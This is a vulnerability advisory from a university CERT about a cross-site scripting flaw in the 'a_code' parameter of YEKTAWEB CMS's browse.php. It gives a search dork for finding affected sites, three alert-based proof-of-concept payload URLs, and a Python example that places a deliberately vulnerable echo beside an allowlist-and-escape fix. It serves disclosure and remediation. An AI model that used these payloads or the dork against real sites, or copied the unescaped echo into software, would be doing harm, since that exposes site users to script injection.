================= IUT-CERT =================

Title: YEKTAWEB CMS XSS Vulnerability

Vendor: www.yektaweb.com

Dork: Powered by Academic Web Tools ( AWT ) - Yektaweb Collection

Type: Input.Validation.Vulnerability (Cross-Site Scripting)

Fix: N/A

================== nsec.ir =================





Description:
--------------------------------------------

YEKTAWEB is an academic web tool. The "browse.php" page in this CMS is vulnerable
to XSS and link injection.





Vulnerability Variant:
---------------------------------------------

XSS: the "a_code" parameter of "browse.php".

http://www.example.com/browse.php?a_code=";></IFRAME><script>alert(12345)</script>&sid=1&slc_lang=fa

http://www.example.com/browse.php?a_code=1<iframe/+/onload=alert(12345)></iframe>.

http://www.example.com/browse.php?a_code=1>"><ScRiPt %0A%0D>alert(12345)%3B</ScRiPt>.



Solution:
---------------------------------------------

Input validation of the "a_code" parameter should be corrected.
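
The following is an added illustration of that fix, not code from YEKTAWEB (which is PHP): it reproduces the reported behaviour of echoing "a_code" unchanged, places an allowlist-plus-output-encoding version beside it, and runs both against the three proof-of-concept URLs quoted above. The accepted code format ([A-Za-z0-9_-], up to 32 characters) and the input-attribute sink are assumptions, since the advisory does not give either.

```python
import html
import re
from urllib.parse import unquote_plus, urlsplit

# The three proof-of-concept URLs quoted in the advisory.
POC_URLS = [
    'http://www.example.com/browse.php?a_code=";></IFRAME><script>alert(12345)</script>&sid=1&slc_lang=fa',
    'http://www.example.com/browse.php?a_code=1<iframe/+/onload=alert(12345)></iframe>',
    'http://www.example.com/browse.php?a_code=1>"><ScRiPt %0A%0D>alert(12345)%3B</ScRiPt>',
]

# Assumed shape of a legitimate academic code (the advisory does not define
# the format): 1 to 32 letters, digits, underscores or hyphens.
A_CODE_RE = re.compile(r'[A-Za-z0-9_-]{1,32}')


def a_code_from_url(url):
    """Return the decoded a_code query value, as the server would receive it."""
    for pair in urlsplit(url).query.split('&'):
        key, _, value = pair.partition('=')
        if key == 'a_code':
            return unquote_plus(value)   # %0A%0D -> LF/CR, '+' -> space, %3B -> ';'
    return ''


def vulnerable_render(a_code):
    """Mirrors the reported defect: the parameter is echoed into HTML untouched."""
    return '<input name="a_code" value="' + a_code + '">'


def hardened_render(a_code):
    """Allowlist the parameter, then encode it on output.

    Returns None when the value is rejected; the caller should answer 400.
    """
    if not A_CODE_RE.fullmatch(a_code):
        return None
    # Encoding is kept even after validation so the value can never close the
    # attribute or start a tag if the allowlist is ever loosened.
    return '<input name="a_code" value="' + html.escape(a_code, quote=True) + '">'


if __name__ == '__main__':
    for url in POC_URLS:
        code = a_code_from_url(url)
        print('vulnerable :', vulnerable_render(code))
        print('hardened   :', hardened_render(code))
    print('legitimate :', hardened_render('ACD-101'))
```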





Credit:
---------------------------------------------

Isfahan University of Technology - Computer Emergency Response Team

Thanks to: N. Fathi, M. R. Faghani
